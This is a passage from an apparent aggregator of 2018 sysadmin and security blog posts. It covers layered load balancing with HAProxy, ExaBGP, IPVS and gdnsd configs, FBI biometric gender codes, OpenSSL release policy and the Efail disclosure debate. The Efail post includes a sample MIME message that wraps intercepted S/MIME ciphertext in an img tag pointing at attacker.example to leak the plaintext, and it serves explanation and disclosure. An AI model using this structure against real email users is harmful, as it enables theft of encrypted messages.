socat -ly \
  TCP6-LISTEN:5555,ipv6only=0,reuseaddr,fork \
  OPEN:/etc/lb/agent-check,rdonly
```

Put UP in /etc/lb/agent-check when the service is in nominal mode. If the regular healthcheck is also positive, HAProxy will send requests to this node. When you need to put it into maintenance, write MAINT and wait for the existing connections to terminate. Use READY to cancel this mode.

2. The load-balancer itself should provide a healthcheck endpoint (/healthcheck) for the upper tier.
It will return a 503 error if either there are no backend servers available or if the enabler backend has been put down through the agent check. The same mechanism as for regular backends can be used to signal the unavailability of this load-balancer.

Additionally, the send-proxy directive enables the proxy protocol to transmit the real clients' IP addresses. This protocol also works for non-HTTP connections and is supported by a variety of servers, including nginx:

```
http {
  server {
    listen [::]:80 default ipv6only=off proxy_protocol;
    root /var/www;
    set_real_ip_from ::/0;
    real_ip_header proxy_protocol;
  }
}
```

As is, this solution is not complete. We have just moved the availability and scalability problem somewhere else. How do we load-balance the requests between the load-balancers?

# First tier: ECMP routing⚓︎

On most modern routed IP networks, redundant paths exist between clients and servers. For each packet, routers have to choose a path. When the cost associated with each path is equal, incoming flows4 are load-balanced among the available destinations. This characteristic can be used to balance connections among the available load-balancers. There is little control over the load-balancing, but ECMP routing brings the ability to scale both tiers horizontally.

A common way to implement such a solution is to use BGP, a routing protocol to exchange routes between network equipment. Each load-balancer announces to its connected routers the IP addresses it is serving. If we assume you already have BGP-enabled routers available, ExaBGP is a flexible solution to let the load-balancers advertise their availability. Here is a configuration for one of the load-balancers:

```
# Healthcheck for IPv6
process service-v6 {
  run python -m exabgp healthcheck -s --interval 10 --increase 0 --cmd "test -f /etc/lb/v6-ready -a ! -f /etc/lb/disable";
  encoder text;
}

template {
  # Template for IPv6 neighbors
  neighbor v6 {
    router-id 192.0.2.132;
    local-address 2001:db8::192.0.2.132;
    local-as 65000;
    peer-as 65000;
    hold-time 6;
    family {
      ipv6 unicast;
    }
    api services-v6 {
      processes [ service-v6 ];
    }
  }
}

# First router
neighbor 2001:db8::192.0.2.254 {
  inherit v6;
}

# Second router
neighbor 2001:db8::192.0.2.253 {
  inherit v6;
}
```

If /etc/lb/v6-ready is present and /etc/lb/disable is absent, all the IP addresses configured on the lo interface will be announced to both routers. If the other load-balancers use a similar configuration, the routers will distribute incoming flows between them. Some external process should manage the existence of the /etc/lb/v6-ready file by checking the healthiness of the load-balancer (using the /healthcheck endpoint, for example). An operator can remove a load-balancer from the rotation by creating the /etc/lb/disable file. To get more details on this part, have a look at "High availability with ExaBGP." If you are in the cloud, this tier is usually implemented by your cloud provider, either using an anycast IP address or a basic L4 load-balancer.

Unfortunately, this solution is not resilient when an expected or unexpected change happens. Notably, when adding or removing a load-balancer, the number of available routes for a destination changes. The hashing algorithm used by routers is not consistent and flows are reshuffled among the available load-balancers, breaking existing connections. Moreover, each router may choose its own routes: when a router becomes unavailable, the second one may route the same flows differently.

If you think this is not an acceptable outcome, notably if you need to handle long connections like file downloads, video streaming or websocket connections, you need an additional tier. Keep reading!

# Second tier: L4 load-balancing⚓︎

The second tier is the glue between the stateless world of IP routers and the stateful land of L7 load-balancing.
It is implemented with L4 load-balancing. The terminology can be a bit confusing here: this tier routes IP datagrams (no TCP termination) but the scheduler uses both the destination IP and port to choose an available L7 load-balancer. The purpose of this tier is to ensure all members take the same scheduling decision for an incoming packet.

There are two options:

• stateful L4 load-balancing with state synchronization across the members, or
• stateless L4 load-balancing with consistent hashing.

The first option increases complexity and limits scalability. We won't use it.5 The second option is less resilient during some changes but can be enhanced with a hybrid approach using a local state.

We use IPVS, a performant L4 load-balancer running inside the Linux kernel, with Keepalived, a frontend to IPVS with a set of healthcheckers to kick out an unhealthy component. IPVS is configured to use the Maglev scheduler, a consistent hashing algorithm from Google. Among its family, this is a great algorithm because it spreads connections fairly, minimizes disruptions during changes and is quite fast at building its lookup table. Finally, to improve performance, we let the last tier (the L7 load-balancers) send back answers directly to the clients without involving the second tier (the L4 load-balancers). This is referred to as direct server return (DSR) or direct routing (DR).

With such a setup, we expect packets from a flow to be able to move freely between the components of the first two tiers while sticking to the same L7 load-balancer.
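The property that makes this work is consistent hashing: every L4 node maps a flow to the same L7 load-balancer without sharing state, and removing a destination only remaps the flows that pointed at it. Here is a minimal Python illustration using rendezvous (highest-random-weight) hashing, which is not the Maglev algorithm used above but exhibits the same property; all names are illustrative:

```python
import hashlib

def _score(flow, backend):
    # Deterministic pseudo-random weight for the (flow, backend) pair.
    digest = hashlib.sha256(f"{flow}|{backend}".encode()).digest()
    return int.from_bytes(digest[:8], "big")

def pick_backend(flow, backends):
    # Rendezvous hashing: every L4 node independently picks the backend
    # with the highest score, so they all agree without synchronization.
    return max(backends, key=lambda b: _score(flow, b))

backends = ["lb7-a", "lb7-b", "lb7-c", "lb7-d"]
flows = [f"203.0.113.{i}:443" for i in range(256)]
before = {f: pick_backend(f, backends) for f in flows}
after = {f: pick_backend(f, backends[:-1]) for f in flows}  # drop lb7-d
# Only the flows that were on the removed backend move; all others stick.
moved = [f for f in flows if before[f] != after[f]]
assert all(before[f] == "lb7-d" for f in moved)
```

Maglev achieves the same minimal-disruption behavior with a precomputed lookup table, which makes per-packet decisions much cheaper than scoring every backend.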
## Configuration⚓︎

Assuming ExaBGP has already been configured as described in the previous section, let's start with the configuration of Keepalived:

```
virtual_server_group VS_GROUP_MH_IPv6 {
  2001:db8::198.51.100.1 80
}
virtual_server group VS_GROUP_MH_IPv6 {
  lvs_method TUN  # Tunnel mode for DSR
  lvs_sched mh    # Scheduler: Maglev
  sh-port         # Use port information for scheduling
  protocol TCP
  delay_loop 5
  alpha           # All servers are down on start
  omega           # Execute quorum_down on shutdown
  quorum_up "/bin/touch /etc/lb/v6-ready"
  quorum_down "/bin/rm -f /etc/lb/v6-ready"
  # First L7 load-balancer
  real_server 2001:db8::192.0.2.132 80 {
    weight 1
    HTTP_GET {
      url {
        path /healthcheck
        status_code 200
      }
      connect_timeout 2
    }
  }
  # Many others...
}
```

The quorum_up and quorum_down statements define the commands to be executed when the service becomes available and unavailable, respectively. The /etc/lb/v6-ready file is used as a signal for ExaBGP to advertise the service IP address to the neighbor routers.

Additionally, IPVS needs to be configured to continue routing packets from a flow moved from another L4 load-balancer. It should also continue routing packets from unavailable destinations to ensure we can properly drain an L7 load-balancer:

```
# Schedule non-SYN packets
sysctl -qw net.ipv4.vs.sloppy_tcp=1
# Do NOT reschedule a connection when destination
# doesn't exist anymore
sysctl -qw net.ipv4.vs.expire_nodest_conn=0
sysctl -qw net.ipv4.vs.expire_quiescent_template=0
```

The Maglev scheduling algorithm will be available with Linux 4.18, thanks to Inju Song. For older kernels, I have prepared a backport.6 Using source hashing as a scheduling algorithm instead would hurt the resilience of the setup.

DSR is implemented using the tunnel mode. This method is compatible with routed datacenters and cloud environments. Requests are tunneled to the scheduled peer using IPIP encapsulation. It adds a small overhead and may lead to MTU issues.
If possible, ensure you are using a larger MTU for communication between the second and third tiers.7 Otherwise, it is better to explicitly allow fragmentation of IP packets:

```
sysctl -qw net.ipv4.vs.pmtu_disc=0
```

You also need to configure the L7 load-balancers to handle encapsulated traffic:8

```
# Setup IPIP tunnel to accept packets from any source
ip tunnel add tunlv6 mode ip6ip6 local 2001:db8::192.0.2.132
ip link set up dev tunlv6
ip addr add 2001:db8::198.51.100.1/128 dev tunlv6
```

## Evaluation of the resilience⚓︎

As configured, the second tier increases the resilience of this setup for two reasons:

1. The scheduling algorithm uses a consistent hash to choose its destination. Such an algorithm reduces the negative impact of expected or unexpected changes by minimizing the number of flows moving to a new destination. "Consistent Hashing: Algorithmic Tradeoffs" offers more details on this subject.
2. IPVS keeps a local connection table for known flows. When a change impacts only the third tier, existing flows will be correctly directed according to the connection table.

If we add or remove an L4 load-balancer, existing flows are not impacted because each load-balancer takes the same decision, as long as they see the same set of L7 load-balancers. If we add an L7 load-balancer, existing flows are not impacted either, because only new connections will be scheduled to it. For existing connections, IPVS will look at its local connection table and continue to forward packets to the original destination. Similarly, if we remove an L7 load-balancer, only the existing flows terminating at this load-balancer are impacted; other existing connections will be forwarded correctly.

We need simultaneous changes on both levels to get a noticeable impact. For example, when adding both an L4 load-balancer and an L7 load-balancer, only connections moved to an L4 load-balancer without state and scheduled to the new load-balancer will be broken.
Thanks to the consistent hashing algorithm, other connections will stay bound to the right L7 load-balancer. During a planned change, this disruption can be minimized by adding the new L4 load-balancers first, waiting a few minutes, then adding the new L7 load-balancers.

Additionally, IPVS correctly routes ICMP messages to the same L7 load-balancers as the associated connections. This notably ensures path MTU discovery works and there is no need for smart workarounds.

# Tier 0: DNS load-balancing⚓︎

Optionally, you can add DNS load-balancing to the mix. This is useful either if your setup is spread across multiple datacenters or multiple cloud regions, or if you want to break a large load-balancing cluster into smaller ones. It is not intended to replace the first tier as it doesn't share the same characteristics: load-balancing is unfair (it is not flow-based) and recovery from a failure is slow.

gdnsd is an authoritative-only DNS server with integrated healthchecking. It can serve zones from master files using the RFC 1035 zone format:

```
@ SOA ns1 ns1.example.org. 1 7200 1800 259200 900
@ NS ns1.example.com.
@ NS ns1.example.net.
@ MX 10 smtp

@   60 DYNA multifo!web
www 60 DYNA multifo!web
smtp A 198.51.100.99
```

The special RR type DYNA will return A and AAAA records after querying the specified plugin. Here, the multifo plugin implements an all-active failover of monitored addresses:

```
service_types => {
  web => {
    plugin => http_status
    url_path => /healthcheck
    down_thresh => 5
    interval => 5
  }
  ext => {
    plugin => extfile
    file => /etc/lb/ext
    def_down => false
  }
}
plugins => {
  multifo => {
    web => {
      service_types => [ ext, web ]
      addrs_v4 => [ 198.51.100.1, 198.51.100.2 ]
      addrs_v6 => [ 2001:db8::198.51.100.1, 2001:db8::198.51.100.2 ]
    }
  }
}
```

In the nominal state, an A request will be answered with both 198.51.100.1 and 198.51.100.2. A healthcheck failure will update the returned set accordingly.
It is also possible to administratively remove an entry by modifying the /etc/lb/ext file. For example, with the following content, 198.51.100.2 will not be advertised anymore:

```
198.51.100.1 => UP
198.51.100.2 => DOWN
2001:db8::c633:6401 => UP
2001:db8::c633:6402 => UP
```

You can find all the configuration files and the setup of each tier in the GitHub repository. If you want to replicate this setup at a smaller scale, it is possible to collapse the second and the third tiers by using either localnode or network namespaces. Even if you don't need its fancy load-balancing services, you should keep the last tier: while backend servers come and go, the L7 load-balancers bring stability, which translates to resiliency.

1. In this article, "backend servers" are the servers behind the load-balancing layer. To avoid confusion, we will not use the term "frontend." ↩︎
2. A good summary of the paper is available from Adrian Colyer. From the same author, you may also have a look at the summary for "Stateless datacenter load-balancing with Beamer." ↩︎
3. If you feel this solution is fragile, feel free to develop your own agent. It could coordinate with a key-value store to determine the wanted state of the server. It is possible to centralize the agent in a single location, but you may get a chicken-and-egg problem to ensure its availability. ↩︎
4. A flow is usually determined by the source and destination IP and the L4 protocol. Alternatively, the source and destination ports can also be used. The router hashes this information to choose the destination. For Linux, you may find more information on this topic in "Celebrating ECMP in Linux." ↩︎
5. On Linux, it can be implemented by using Netfilter for load-balancing and conntrackd to synchronize state. IPVS only provides active/backup synchronization. ↩︎
6. The backport is not strictly equivalent to its original version. Be sure to check the README file to understand the differences.
Briefly, in the Keepalived configuration, you should:

• not use inhibit_on_failure
• use sh-port
• not use sh-fallback

↩︎
7. At least 1520 for IPv4 and 1540 for IPv6. ↩︎
8. As is, this configuration is insecure. You need to ensure only the L4 load-balancers will be able to send IPIP traffic. ↩︎

## May 22, 2018

### SysAdmin1138

#### Database schemas vs. identity

Yesterday brought this tweet up:

This is amazingly bad wording, and is the kind of thing that made the transpeople in my timeline (myself included) go "Buwhuh?" and me wonder if this was a Snopes-worthy story. No, actually. The key phrase here is, "submit your prints for badges". There are two things you should know:

1. NASA works on National Security related things, which require a security clearance to work on, and getting one of those requires submitting prints.
2. The FBI is the US Government's authority in handling biometric data.

Here is a chart from the Electronic Biometric Transmission Specification, which describes a kind of API for dealing with biometric data:

| If Following Condition Exists | Enter Code |
| --- | --- |
| Subject's gender reported as female | F |
| Occupation or charge indicated "Male Impersonator" | G |
| Subject's gender reported as male | M |
| Occupation or charge indicated "Female Impersonator" or transvestite | N |
| Male name, no gender given | Y |
| Female name, no gender given | Z |
| Unknown gender | X |

Yep, it really does use the term "Female Impersonator". To a transperson living in 2016 getting their first Federal job (even as a contractor), running into these very archaic terms is extremely off-putting. As someone said in a private channel:

> This looks like some 1960's bureaucrat trying to be 'inclusive'

This is not far from the truth. This table exists unchanged in the 7.0 version of the document, dated January 1999. Previous versions are in physical binders somewhere, and not archived on the Internet; but the changelog for the V7 document indicates that this wording was in place as early as 1995.
Mention is also made of being interoperable with UK law-enforcement. The NIST standard for fingerprints issued in 1986 mentions a SEX field, but it only has M, F, and U; later NIST standards drop this field definition entirely.

As this field was defined in a standard over 20 years ago and has not been changed, is used across the full breadth of the US justice system, is referenced in international communications standards including visa travel, and is used as the basis for US Military standards, these field definitions are effectively immutable and will only change after concerted effort over decades. This is what institutionalized transphobia looks like, and we will be dealing with it for another decade or two. If not longer.

The way to deal with this is to deprecate the codes in documentation, but still allow them as valid.

• Create a deprecation notice in the definition of the field saying that the G and N values are to be considered deprecated and should not be used.
• In the deprecation notice, say that in the future, new records will not be accepted with those values.
• Those values will remain valid for queries, because there are decades of legacy coding in databases using them.

The failure-mode of this comes in with form designers who look at the spec and build forms based on the spec. Like this example from Maryland. Which means we need to let the forms designers know that the spec needs to be selectively ignored. The deprecation notice does that.

At the local level, convince your local City Council to pass resolutions to modernize their Police forms to reflect modern sensibilities, and drop the G and N codes from intake forms. Do this at the County too, for the Sheriff's department. At the state level, convince your local representatives to push resolutions to get the State Patrol to modernize their forms likewise. Drop the G and N codes from the forms. 
At the Federal employee level, there is less to be done here as you're closer to the governing standards, but you may be able to convince The Powers That Be to drop the two offensive checkboxes or items from the drop-down list. At the Federal standard level, lobby the decision makers that govern this standard and push for a deprecation notice. If any of your congress-people are on any Judiciary committees, you'll have more luck than most.

## May 18, 2018

### OpenSSL

#### New LTS Release

Back around the end of 2014 we posted our release strategy. This was the first time we defined support timelines for our releases, and added the concept of an LTS (long-term support) release. At our OMC meeting earlier this month, we picked our next LTS release. This post walks through that announcement, and tries to explain all the implications of it.

Once an official release is made, it enters support mode. No new features are added – those only go into the next release. In rare cases we will make an exception; for example, we said that if any accessors or setters are missing in 1.1.0, because of structures being made opaque, we would treat that as a bug.

Support itself is divided into three phases. First, there is active and ongoing support, which begins once the release is published; all bugs are appropriate for this phase. Next is the security-only phase, covering the final year of support, where we only fix security bugs, which will typically have a CVE associated with them. Finally, there is EOL (end of life), where the project no longer provides any support or fixes.

In the typical case, a release is supported for at least two years, which means one year of fixes and one year of security-only fixes. Some releases, however, are designated as LTS releases. They are supported for at least five years. We will specify an LTS release at least every four years, which gives the community at least a year to migrate. 
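As a rough sketch (illustrative only, not an official OpenSSL tool), the timeline rules above can be expressed as a small function: a regular release gets about two years, an LTS release at least five, and the final year of either is security-only:

```python
from datetime import date

def support_phase(release: date, today: date, lts: bool = False) -> str:
    """Classify a release's support phase per the policy sketched above.

    Regular releases: ~2 years of support; LTS releases: at least 5.
    The last year before EOL is security-fixes-only.
    (Simplified year arithmetic; real EOL dates are set by the project.)
    """
    years = 5 if lts else 2
    eol = date(release.year + years, release.month, release.day)
    security_only = date(eol.year - 1, eol.month, eol.day)
    if today >= eol:
        return "end-of-life"
    if today >= security_only:
        return "security-fixes-only"
    return "full-support"
```

For example, a hypothetical non-LTS release shipped on 2016-01-01 would be in its security-only year by mid-2017, while the same date treated as an LTS release would still be in full support.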
Our current LTS release is 1.0.2, and it will be supported until the end of 2019. During that last year it will only receive security fixes. Although we are extending 1.1.0 support, we explicitly decided not to do it again, for either release.

Our next LTS release will be 1.1.1, which is currently in beta. As long as the release is out before the end of 2018, there is more than a year to migrate. (We’re confident it will be out before then, of course.) We encourage everyone to start porting to the OpenSSL master branch. The 1.1.0 release will be supported for one year after 1.1.1 is released. And again, during that final year we will only provide security fixes. Fortunately, 1.1.0 is ABI compatible with 1.1.1, so moving up should not be difficult. Our TLS 1.3 wiki page has some more details around the impact of TLS 1.3 support.

Finally, this has an impact on the OpenSSL FIPS module, #1747. That module is valid until January 29, 2022. This means that for the final two-plus years of its validity, we will not be supporting the release on which the module is based. We have already stated that we do not support the module itself; this adds to the burden that vendors will have to take on. On the positive side, we’re committed to a new FIPS module: it will be based on the current codebase, and we think we can get it done fairly quickly.

## May 17, 2018

### Cryptography Engineering

#### Was the Efail disclosure horribly screwed up?

TL;DR: No. Or keep reading if you want.

On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction. By the standards of cryptographic vulnerabilities, this is about as bad as things get. 
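To make that concrete, the paper's simplest attack variant ("direct exfiltration") wraps the intercepted ciphertext in an HTML image tag split across MIME parts. The structure below paraphrases the technique described in the Efail paper; `attacker.example` and the boundary string are placeholders:

```
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="http://attacker.example/
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data
Content-Transfer-Encoding: base64

(intercepted S/MIME ciphertext)
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY--
```

A vulnerable client decrypts the middle part and stitches all three parts into a single HTML document, so the recovered plaintext lands inside the unterminated src attribute and is sent to the attacker's server when the "image" is fetched.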
In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker-controlled server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients.

The big (and largely under-reported) story of Efail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) probably the most widely-used email encryption protocol in the corporate world. The table at the right — excerpted from the paper — gives you a flavor of how Efail affects S/MIME clients. TL;DR: it affects them very badly. Efail also happens to affect a smaller, but non-trivial, number of OpenPGP-compatible clients.

As one might expect (if one has spent time around PGP-loving folks), the disclosure of these vulnerabilities has created something of a backlash on HN, and among people who make and love OpenPGP clients. Mostly for reasons that aren’t very defensible. So rather than write about fun things — like the creation of CFB and CBC gadgets — today, I’m going to write about something much less exciting: the problem of vulnerability disclosure in ecosystems like PGP. And how bad reactions to disclosure can hurt us all.

### How Efail was disclosed to the PGP community

Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us. Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. 
The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell, every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding. All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story.

There are three basic accusations going around about the Efail disclosure. They can be summarized as: (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway, so what’s the big deal?

### Disclosures are hard; particularly coordinated ones

I’ve been involved in two disclosures of flaws in open encryption protocols. (Both were TLS issues.) Each one poses an impossible dilemma. You need to simultaneously (a) make sure every vendor has as much advance notice as possible, so they can patch their software, and (b) avoid telling literally anyone, because nothing on the Internet stays secret. At some point you’ll notify some FOSS project that uses an open development mailing list or ticket server, and the whole problem will leak out into the open.

Disclosing bugs that affect PGP is particularly fraught. That’s because there’s no such thing as “PGP”. What we have instead is a large and distributed community that revolves around the OpenPGP protocol. 
The pillar of this community is the GnuPG project, which maintains the core GnuPG tool and libraries that many clients rely on. Then there are a variety of niche GUI-based clients and email plugin projects. Finally, there are commercial vendors like Apple and Microsoft. (Who are mostly involved in the S/MIME side of things, and may reluctantly allow PGP plugins.) Then, of course, there are thousands of end-users, who will generally fail to update their software unless something really bad and newsworthy happens.

The obvious solution to the disclosure problem is to use a staged disclosure. You notify the big commercial vendors first, since that’s where most of the affected users are. Then you work your way down the “long tail” of open source projects, knowing that inevitably the embargo could break and everyone will have to patch in a hurry. And you keep in mind that no matter what happens, everyone will blame you for screwing up the disclosure.

For the PGP issues in Efail, the big client vendors are Mozilla (Thunderbird), Microsoft (Outlook) and maybe Apple (Mail). The very next obvious choice would be to patch the GnuPG tool so that it no longer spits out unauthenticated plaintext, which is the root of many of the problems in Efail.

The Efail team appears to have pursued exactly this approach for the client-side vulnerabilities. Sadly, the GnuPG team made the decision that it’s not their job to pre-emptively address problems that they view as ‘clients misusing the GnuPG API’ (my paraphrase), even when that misuse appears to be rampant across many of the clients that use their tool. And so the most obvious fix for one part of the problem was not available.

This is probably the most unfortunate part of the Efail story, because in this case GnuPG is very much at fault. Their API does something that directly violates cryptographic best practices — namely, releasing unauthenticated plaintext prior to producing an error message. 
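To illustrate the distinction, here is a minimal sketch of the two API shapes. This is hypothetical code, not GnuPG's; `check_mdc` stands in for the OpenPGP modification-detection check:

```python
# Sketch of the API anti-pattern described above: handing plaintext to
# the caller before the integrity check (the OpenPGP MDC) has run.

def unsafe_decrypt_stream(blocks, decrypt_block, check_mdc, emit):
    """Streams each decrypted chunk to the caller immediately."""
    plaintext = b""
    for block in blocks:
        chunk = decrypt_block(block)
        plaintext += chunk
        emit(chunk)  # an email client may already render/leak this chunk
    if not check_mdc(plaintext):
        raise ValueError("bad MDC")  # too late: plaintext already released

def safe_decrypt(blocks, decrypt_block, check_mdc):
    """Releases plaintext only after the integrity check passes."""
    plaintext = b"".join(decrypt_block(b) for b in blocks)
    if not check_mdc(plaintext):
        raise ValueError("bad MDC")
    return plaintext
```

With the unsafe variant, a client that renders output as it arrives can be tricked into leaking modified plaintext (the Efail gadgets) even though an error is eventually raised; the safe variant never exposes plaintext from a tampered message.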
And while this could be understood as a reasonable API design at design time, continuing to support this API even as clients routinely misuse it has now led to flaws across the ecosystem. The refusal of GnuPG to take a leadership role in preemptively safeguarding against these vulnerabilities both increases the difficulty of disclosing these flaws, and increases the probability of future issues.

### So what went wrong with the Efail disclosure?

Despite what you may have heard, given the complexity of this disclosure, very little went wrong. The main issues people have raised seem to have to do with the contents of an EFF post. And with some really bad communications from Robert J. Hansen at the Enigmail (and GnuPG) project.

The EFF post. The Efail researchers chose to use the Electronic Frontier Foundation as their main source for announcing the existence of the vulnerability to the privacy community. This hardly seems unreasonable, because the EFF is generally considered a trusted broker, and speaks to the right community (at least here in the US). The EFF post doesn’t give many details, nor does it give a list of affected (or patched) clients. It does give two pretty mild recommendations:

1. Temporarily disable or uninstall your existing clients until you’ve checked that they’re patched.
2. Maybe consider using a more modern cryptosystem like Signal, at least until you know that your PGP client is safe again.

This naturally led to a huge freakout by many in the PGP community. Some folks, including vendors, have misrepresented the EFF post as essentially pushing people to “permanently” uninstall PGP, which will “put lives at risk” because presumably these users (whose lives are at risk, remember) will immediately fall back to sending incriminating information via plaintext emails — rather than temporarily switching their communications to one of several modern, well-studied secure messengers, or just not emailing for a few hours. 
In case you think I’m exaggerating about this, here’s one reaction from ProtonMail:

The most reasonable criticism I’ve heard of the EFF post is that it doesn’t give many details about which clients are patched, and which are vulnerable. This could presumably give someone the impression that this vulnerability is still present in their email client, and thus would cause them to feel less than secure in using it. I have to be honest that, to me, that sounds like a really good outcome. The problem with Efail is that it doesn’t matter if your client is secure. The Efail vulnerability could affect you if even a single one of your communication partners is using an insecure client. So needless to say, I’m not very sympathetic to the reaction around the EFF post. If you can’t be sure whether your client is secure, you probably should feel insecure.

Bad communications from GnuPG and Enigmail. On the date of the disclosure, anyone looking for accurate information about security from two major projects — GnuPG and Enigmail — would not have been able to find it. They wouldn’t have found it because developers from both Enigmail and GnuPG were on mailing lists and Twitter claiming that they had never heard of Efail, and hadn’t been notified by the researchers. Needless to say, these allegations took off around the Internet, sometimes in place of real information that could have helped users (like whether either project had patched).

It goes without saying that neither allegation was actually true. In fact, members of both projects soon checked with their fellow developers (and their memories) and found out that they’d both been given months of notice by the researchers, and that Enigmail had even developed a patch. (However, it turned out that even this patch may not perfectly address the issue, and the community is still working to figure out exactly what still needs to be done.) This is an understandable mistake, perhaps. But it sure is a bad one. 
### PGP is bad technology and it’s making a bad community

Now that I’ve made it clear that neither the researchers nor the EFF is out to get the PGP community, let me put on my mask and horns and tell you why someone should be.

I’ve written extensively about PGP on this blog, but in the past I’ve written mostly from a technical point of view about the problems with PGP. But what’s really problematic about PGP is not just the cryptography; it’s the story it tells about path dependence and how software communities work. The fact of the matter is that OpenPGP is not really a cryptography project. That is, it’s not held together by cryptography. It’s held together by backwards-compatibility and (increasingly) a kind of an obsession with the idea of PGP as an end in and of itself, rather than as a means to actually make end-users more secure.

Let’s face it: as a protocol, PGP/OpenPGP is just not what we’d develop if we started over today. It was formed over the years out of mostly experimental parts, which were in turn replaced, bandaged and repaired — and then worked into numerous implementations, which all had to be insanely flexible and yet compatible with one another. The result is bad, and most of the software implementing it is worse. It’s the equivalent of a beloved antique sports car, where the electrical system is totally shot, but it still drives. You know, the kind of car where the owner has to install a hand-switch so he can turn the reverse lights on manually whenever he wants to pull out of a parking space.

If PGP went away, I estimate it would take the security community less than a year to entirely replace (the key bits of) the standard with something much better and modern. It would have modern crypto and authentication, and maybe even extensions for future post-quantum security. It would be simple. Many bright new people would get involved to help write the inevitable Rust, Go and Javascript clients and libraries. 
Unfortunately for us all, (Open)PGP does exist. And that means that even fancy greenfield email projects feel like they need to support OpenPGP, or at least some subset of it. This in turn perpetuates the PGP myth, and causes other clients to use it. And as a direct result, even if some clients re-implement OpenPGP from scratch, other clients will end up using tools like GnuPG, which will support unauthenticated encryption with bad APIs. And the cycle will go round and around, like a spaceship stuck near the event horizon of a black hole.

And as the standard perpetuates itself, largely for the sake of being a standard, it will fail to attract new security people. It will turn away exactly the type of people who should be working on these tools. Those people will go off and build encryption systems in a totally different area, or they’ll get into cryptocurrency. And — with some exceptions — the people who work in the community will increasingly work in that community because they’re supporting PGP, and not because they’re trying to seek out the best security technologies for their users. And the serious (email) users of PGP will be using it because they like the idea of using PGP better than they like using an actual, secure email standard. And as things get worse, and fail to develop, people who work on it will become more dogmatic about its importance, because it’s something threatened and not a real security protocol that anyone’s using.

To me that’s where PGP is going today, and that is why the community has such a hard time motivating itself to take these vulnerabilities seriously, and instead reacts defensively. Maybe that’s a random, depressing way to end a post. But that’s the story I see in OpenPGP. And it makes me really sad.

## May 16, 2018

### OpenSSL

#### Changing the Guiding Principles in Our Security Policy

“That we remove “We strongly believe that the right to advance patches/info should not be based in any way on paid membership to some forum. 
You can not pay us to get security patches in advance.” from the security policy and Mark posts a blog entry to explain the change including that we have no current such service.”

At the OpenSSL Management Committee meeting earlier this month we passed the vote above to remove a section of our security policy. Part of that vote was that I would write this blog post to explain why we made this change. At each face-to-face meeting we aim to ensure that our policies still match the view of the current committee membership at that time, and we vote to change those that don’t.

Prior to 2018 our Security Policy used to contain a lot of background information on why we selected the policy we did, justifying it and adding lots of explanatory detail. We included details of things we’d tried before and things that worked and didn’t work to arrive at our conclusion. At our face-to-face meeting in London at the end of 2017 we decided to remove a lot of the background information and stick to explaining the policy simply and concisely. I split out what were the guiding principles from the policy into their own list.

OpenSSL has some full-time fellows who are paid from various revenue sources coming into OpenSSL, including sponsorship and support contracts. We’ve discussed having the option in the future to allow us to share patches for security issues in advance with these support contract customers. We already share serious issues a little in advance with some OS vendors (and this is still a principle in the policy), and this has helped ensure that the patches and advisory get an extra level of testing before being released. Thankfully there are relatively few serious issues in OpenSSL these days; the last one worse than Moderate severity was in February 2017.

In the vote text we wrote that we have “no current such service” and neither do we have any plan right now to create such a service. 
But we allow ourselves to consider such a possibility in the future now that this principle, which no longer represents the view of the OMC, is removed.

## May 15, 2018

### TaoSecurity

#### Bejtlich Joining Splunk

Since posting Bejtlich Moves On I've been rebalancing work, family, and personal life. I invested in my martial arts interests, helped more with home duties, and consulted through TaoSecurity. Today I'm pleased to announce that, effective Monday May 21st 2018, I'm joining the Splunk team. I will be Senior Director for Security and Intelligence Operations, reporting to our CISO, Joel Fulton. I will help build teams to perform detection and monitoring operations, digital forensics and incident response, and threat intelligence. I remain in the northern Virginia area and will align with the Splunk presence in Tyson's Corner.

I'm very excited by this opportunity for four reasons. First, the areas for which I will be responsible are my favorite aspects of security. Long-time blog readers know I'm happiest detecting and responding to intruders! Second, I already know several people at the company, one of whom began this journey by Tweeting about opportunities at Splunk! These colleagues are top notch, and I was similarly impressed by the people I met during my interviews in San Francisco and San Jose.

Third, I respect Splunk as a company. I first used the products over ten years ago, and when I tried them again recently they worked spectacularly, as I expected. Fourth, my new role allows me to be a leader in the areas I know well, like enterprise defense and digital operational art, while building understanding in areas I want to learn, like cloud technologies, DevOps, and security outside enterprise constraints.

I'll have more to say about my role and team soon. Right now I can share that this job focuses on defending the Splunk enterprise and its customers. I do not expect to spend a lot of time in sales cycles. 
I will likely host visitors in the Tyson's area from time to time. I do not plan to speak as much with the press as I did at Mandiant and FireEye. I'm pleased to return to operational defense, rather than advise on geopolitical strategy. If this news interests you, please check our open job listings in information technology. As a company we continue to grow, and I'm thrilled to see what happens next!

## May 14, 2018

### ma.ttias.be

#### Remote Desktop error: CredSSP encryption oracle remediation

The post Remote Desktop error: CredSSP encryption oracle remediation appeared first on ma.ttias.be.

A while back, Microsoft announced it would ship updates to both its RDP client & server components to resolve a critical security vulnerability. That rollout is now happening and many clients have received the update automatically. As a result, you might see this message/error when connecting to an unpatched Windows server:

